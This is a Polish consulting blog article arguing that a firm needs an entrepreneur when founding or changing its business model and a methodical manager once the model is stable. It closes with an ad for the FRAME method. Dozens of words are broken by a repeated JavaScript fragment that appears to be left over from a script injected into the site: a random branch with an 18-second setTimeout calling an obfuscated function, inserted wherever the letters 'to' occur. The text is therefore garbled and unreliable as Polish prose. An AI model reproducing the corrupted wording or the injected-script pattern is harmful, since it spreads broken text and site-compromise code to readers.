In Artykuły, Handel, Uniwersalne

Każdy jest inny i w dodatku powinien być inny. W życiu dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zaleta, w biznesie nie zawsze. Założenie i posiadanie firmy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to samo co kierowanie nią.

Działanie Modelu opisuje magiczna formuła przedsiębiorstwa, zaś działanie Konceptu Sprzedażowego opisuje magiczna formuła sprzedaży. Jedną i drugą formułą można zarządzać, co prowadzi do wyższego wykorzystania możliwości Modelu. Na poziomie podstawowym wykorzystania Modelu wystarczy zarządzanie codziennością, które pozwoli wykorzystać 80% możliwości. Żeby osiągnąć więcej, zarządzanie codziennością już nie wystarczy, organizacja się broni, przyrost efektu jest już tu bowiem powolny, za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wysiłek jaki trzeba włożyć, rośnie lawinowo ( dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to efekt działania zasady 80/20). Tu organizację trzeba zmusić, czemu służy właśnie zarządzanie formułami.

Uwaga. „czy menedżer potrafi zmusić organizację do wzmożonego wysiłku?” Pewnie potrafi, ale wtedy musiałby zmusić także samego siebie, a on podlega tym samym ograniczeniom wygody co inni pracownicy. A nawet jeśli się na dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zdecyduje, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to szybko się zmęczy, przekonają go pracownicy, zajmie się czymś innym. Dopiero właściciel, przez swoje ponadprzeciętne zainteresowanie ren dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}townością i wykorzystaniem wszystkich możliwości Modelu, jest do tego zdolny. Nie wszyscy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jednak potrafią, nie wszyscy też znają tę możliwość.

To jednak obraz firmy do pewnego s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topnia dojrzałej. Zanim osiągnie ten stan, najpierw musi uformować swój Model, przetes dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować go w praktyce, w konfrontacji z rynkiem i konkurencją. Takim dojrzałym Modelem trzeba już tylko administrować, aż do momentu, gdy przestaje wystarczać i trzeba go co najmniej is dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}totnie zmodyfikować czy wręcz zmienić. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to już operacja, gdzie potrzebne będą umiejętności i osobowość przedsiębiorcy.

W pierwszej fazie niezbędna jest osoba z cechami przedsiębiorcy. W drugiej taka osoba rzadko się sprawdzi, szczególnie zarządzanie codziennością wyda się jej nudne, poza tym wykorzystywanie możliwości o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczenia (tak się buduje Model) dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to co innego niż wykorzystywanie możliwości Modelu.

Czy dalej się tylko administruje?

Czy jednak w fazie dojrzałego Modelu tylko się nim administruje? Model przecież zawsze ewoluuje i potrzebne są zmiany? Tak, ale drobne zmiany na poziomie doskonalenia wymagają podejmowania niewielkiego ryzyka, nie trzeba też dostrzegać is dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}totnych możliwości w o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczeniu. Z tym poradzi sobie administra dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tor. Jeśli zmiany stają się poważne, potrzebna staje się przedsiębiorczość.

Obie funkcje są potrzebne. Nie można jednak powiedzieć, że się przenikają, gdyż są potrzebne nie tyle w różnych obszarach, ile w różnych momentach.

Przedsiębiorczość a administrowanie

Te dwie funkcje bardzo się różnią. Różni je skłonność do ryzyka, zdolność do dostrzeganie możliwości w o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczeniu.

Administrowanie nie tylko trudno jest połączyć z przedsiębiorczością. Ono wręcz tej przedsiębiorczości szkodzi. Uporządkowanie, systematyczność i przewidywalność, podstawowe cechy administra dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tora dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to cechy które przeczą twórczości i kreatywności.

Jednak firmie potrzebne jest jedno i drugie. Sama przedsiębiorczość nie wystarczy, choć na etapie powstawania firmy jest niezbędna, bardzo się też przyda gdy firma czy rynek wchodzą w zakręt i trzeba modyfikować Model Biznesowy.

Przedsiębiorca tworzy

A proces tworzenia Modelu musi być chaotyczny, inaczej nie będzie ani twórczy, ani nie zaprzeczy utartym standardom.

Uwaga. „naśladowcy nie wygrywają”. Czasem wprawdzie mogą, jeśli wystarczy coś zrobić staranniej, dokładniej czy taniej. To jednak daje tylko przewagę kosz dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tową, a ta w końcu się wyczerpie.

O ile jednak właściciel jest wręcz niezbędny przy tworzeniu czy modyfikowaniu Modelu, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to już w jego administrowaniu sprawdza się niewielu. Administrowanie stawia zupełnie inny wyzwania, jest co do zasady nudne, powtarzalne i mało twórcze. Trudno je pogodzić z kreatywnością. Wtedy lepiej zatrudnić kogoś, k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to będzie Modelem administrował.

Menedżer administruje

Trochę też zarządza formułami przedsiębiorstwa i sprzedaży.

Domeną menedżera jest zarządzanie poziomem bazowym formuły. Jeśli jest wybitny, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to pokusi się o sięgnięcie o kolejne 20%, w postaci zarządzanie formułą. Ale

Czy jednak zawsze trzeba wybierać, czy potrzebny jest menedżer czy przedsiębiorca?

Czy zdarza się 2 w 1?

Na pewno tak, choć pewnie rzadko. Jednak dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to niewiele pomoże, i tak wymagania chwili określą, jakie cechy e danym momencie wezmą górę, nawet jeśli menedżer ma cechy przedsiębiorcy. Połączenie umiejętności

Uwaga. „umiejętności czy predyspozycje?” Czy przedsiębiorczości można się nauczyć? Na pewno nie, choć przecież jest o tym wiele książek. Już prędzej można nauczyć się być menedżerem, choć i tu wrodzone predyspozycje są niezbędne. Zarządzanie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to umiejętność, ale umiejętność wykorzystania predyspozycji, te zaś są wrodzone.

Z czasem, wraz z rozwojem i utrwaleniem się Modelu Biznesowego menedżerowie wyprą z firmy przedsiębiorców. Chaos i kosz dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towne próby innowacji przedsiębiorcy zaczną firmie przeszkadzać, generując zbędne wydawałoby się koszty i chaos w firmie. Tu jednak trzeba uważać, wtedy firma zastygnie i jeśli o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczenie się zmieni, nie zareaguje zmianą własnego Modelu.

Podsumowanie

W różnych momentach firmie potrzebni są różni szefowie. Jeśli firma się dopiero tworzy albo kiedy trzeba zmodyfikować jej Model Biznesowy, niezbędny będzie przedsiębiorca. Jeśli jednak Model jest utrwalony i trzeba nim tylko zarządzać, szczególnie na poziomie podstawowym, niezbędny będzie menedżer, osoba uporządkowana, me dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todyczna, przewidywalna i pracowita. Tu chaos i radosna twórczość przedsiębiorcy będą tylko przeszkadzać.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.